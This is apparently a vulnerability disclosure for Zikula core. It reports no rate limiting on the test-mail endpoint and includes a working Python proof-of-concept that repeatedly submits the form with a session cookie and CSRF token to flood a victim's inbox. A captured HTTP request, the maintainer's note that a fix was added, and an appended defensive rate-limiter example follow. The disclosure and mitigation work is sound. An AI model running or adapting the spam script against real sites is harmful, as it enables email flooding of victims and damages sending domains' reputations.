Insufficient Granularity of Access Control in zikula/core
Reported on Jan 3rd 2022
Description
When sending test emails there is no rate limiting on the test-mail endpoint (/mailer/config/test), so an attacker can send as many emails as they want to a victim's email address.
I've put together a simple Python script that exploits this and would allow you to send a custom amount of emails to any victim's email address.
Proof of Concept
```python
# spammailer.py
# Example usage: python3 spammailer.py -csrf "JHja3y8NfO1LWy0UiJ4sC6NxzQoc064tCLQVko6PSj4" -cookie "sqrv94auln8thq23032rflgjc8" -subject "test" -message "test" -email "fuspehulmi@vusra.com"
import requests, argparse


def spammer(csrfToken, cookie, email, subject, message):
    # Form fields of the "send test email" form on /mailer/config/test
    data = {
        "zikulamailermodule_test[toName]": "Test",
        "zikulamailermodule_test[toAddress]": email,
        "zikulamailermodule_test[subject]": subject,
        "zikulamailermodule_test[messageType]": "text",
        "zikulamailermodule_test[bodyHtml]": "",
        "zikulamailermodule_test[bodyText]": message,
        "zikulamailermodule_test[test]": "",
        "zikulamailermodule_test[_token]": csrfToken
    }
    headers = {
        "Host": "demo.ziku.la",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/x-www-form-urlencoded",
        # len(data) is the number of form fields, not the body size; requests
        # recomputes Content-Length from the encoded body, so this value is ignored.
        "Content-Length": str(len(data)),
        "Origin": "https://demo.ziku.la",
        "DNT": "1",
        "Connection": "keep-alive",
        "Referer": "https://demo.ziku.la/mailer/config/test",
        "Cookie": "_zsid=" + cookie,
        "Upgrade-Insecure-Requests": "1",
        "Sec-GPC": "1",
        "TE": "Trailers",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache"}
    r = requests.post("https://demo.ziku.la/mailer/config/test", headers=headers, data=data)
    print(r.status_code)


parser = argparse.ArgumentParser()
parser.add_argument("-csrf", "--csrf-token", required=True, help="Your CSRF token.")
parser.add_argument("-cookie", "--cookie", required=True, help="Your session cookie")
parser.add_argument("-email", "--email", required=True, help="The victim email address")
parser.add_argument("-subject", "--subject", required=True, help="The subject line of the email")
parser.add_argument("-message", "--message", required=True, help="the message of the email")
arguments = parser.parse_args()

# Increase this number within parenthesis to increase the number of emails sent
for i in range(10):
    spammer(arguments.csrf_token, arguments.cookie, arguments.email, arguments.subject, arguments.message)
```
Request:

```http
POST /mailer/config/test HTTP/1.1
Host: demo.ziku.la
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.ziku.la/mailer/config/test
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
Origin: https://demo.ziku.la
DNT: 1
Connection: keep-alive
Cookie: _zsid=4pl4j2sj5m5ee4csbcsq9saqjh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
```
Impact
The impact is negative for the targeted email address and also for the ziku.la domain (or, when the application is hosted on one domain and emails are sent from another, for both domains), since the victim may report the sending domain as a spam source, causing reputational damage to that domain.
Thanks for this report. Added rate limiting like you suggested. Note the fix is not applied to the demo page yet, as this is running an older version at the moment.
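The mitigation the report asks for and the maintainer describes is rate limiting on the test-mail endpoint. The following is an added example of what such a limit can look like; it is not Zikula's code and does not show how Zikula implemented its fix. It assumes a hypothetical handler object (`TestMailEndpoint`) that receives the logged-in user's session id and the form fields, and a stand-in outbox list instead of a real mail transport. It limits two things independently: how many test mails one session may send per window, and how many test mails may go to any one recipient address per window, so that even a legitimately authenticated admin account cannot be used to flood a single address. Recipient addresses are normalised to lower case so case variants share one bucket.

```python
"""Per-sender and per-recipient rate limiting for a 'send test e-mail' endpoint.

Added example, not Zikula's code. TestMailEndpoint is a hypothetical stand-in
for the handler behind POST /mailer/config/test.
"""
import time
from collections import deque


class SlidingWindowLimiter:
    """Allow at most `limit` events per `window` seconds for each key.

    Timestamps of recent events are kept per key; anything older than the
    window is dropped on every access, so memory stays bounded by `limit`.
    """

    def __init__(self, limit, window):
        self.limit = limit
        self.window = float(window)
        self._events = {}  # key -> deque of event timestamps (oldest first)

    def _recent(self, key, now):
        q = self._events.setdefault(key, deque())
        cutoff = now - self.window
        while q and q[0] <= cutoff:
            q.popleft()
        return q

    def is_allowed(self, key, now):
        """True if one more event for `key` would stay within the limit."""
        return len(self._recent(key, now)) < self.limit

    def record(self, key, now):
        """Count one event for `key` at time `now`."""
        self._recent(key, now).append(now)

    def retry_after(self, key, now):
        """Seconds until the oldest counted event leaves the window (0 if allowed)."""
        q = self._recent(key, now)
        if len(q) < self.limit:
            return 0.0
        return q[0] + self.window - now


class TestMailEndpoint:
    """Hypothetical test-mail handler with a per-sender and a per-recipient limit."""

    def __init__(self, per_sender=(5, 600.0), per_recipient=(3, 3600.0)):
        # Defaults: 5 test mails per 10 minutes per session,
        # 3 test mails per hour to any single recipient address.
        self.per_sender = SlidingWindowLimiter(*per_sender)
        self.per_recipient = SlidingWindowLimiter(*per_recipient)
        self.outbox = []  # stands in for the real mail transport

    def handle(self, session_id, to_address, subject, body, now=None):
        now = time.time() if now is None else now
        recipient = to_address.strip().lower()  # case variants share one bucket
        checks = (
            (self.per_sender, session_id, "sender"),
            (self.per_recipient, recipient, "recipient"),
        )
        # Check both limits before counting anything, so a request rejected by
        # the second check does not consume a token from the first.
        for limiter, key, scope in checks:
            if not limiter.is_allowed(key, now):
                return {
                    "status": 429,
                    "scope": scope,
                    "retry_after": round(limiter.retry_after(key, now), 1),
                }
        self.per_sender.record(session_id, now)
        self.per_recipient.record(recipient, now)
        self.outbox.append({"to": recipient, "subject": subject, "body": body, "at": now})
        return {"status": 200}


if __name__ == "__main__":
    # Constructed demo: one session tries to send 12 test mails to one address.
    ep = TestMailEndpoint()
    t0 = 1000.0
    for i in range(12):
        print(i + 1, ep.handle("admin-session", "Victim@example.com", "test", "test", now=t0 + i))
    print("delivered:", len(ep.outbox))
```

The recipient limit is the one that actually protects a victim address; the per-sender limit only caps the total volume an account can generate. Returning `retry_after` lets the front end show a useful message and lets operators alert on repeated 429 responses from the same session, which is the detection signal for the abuse described in the report.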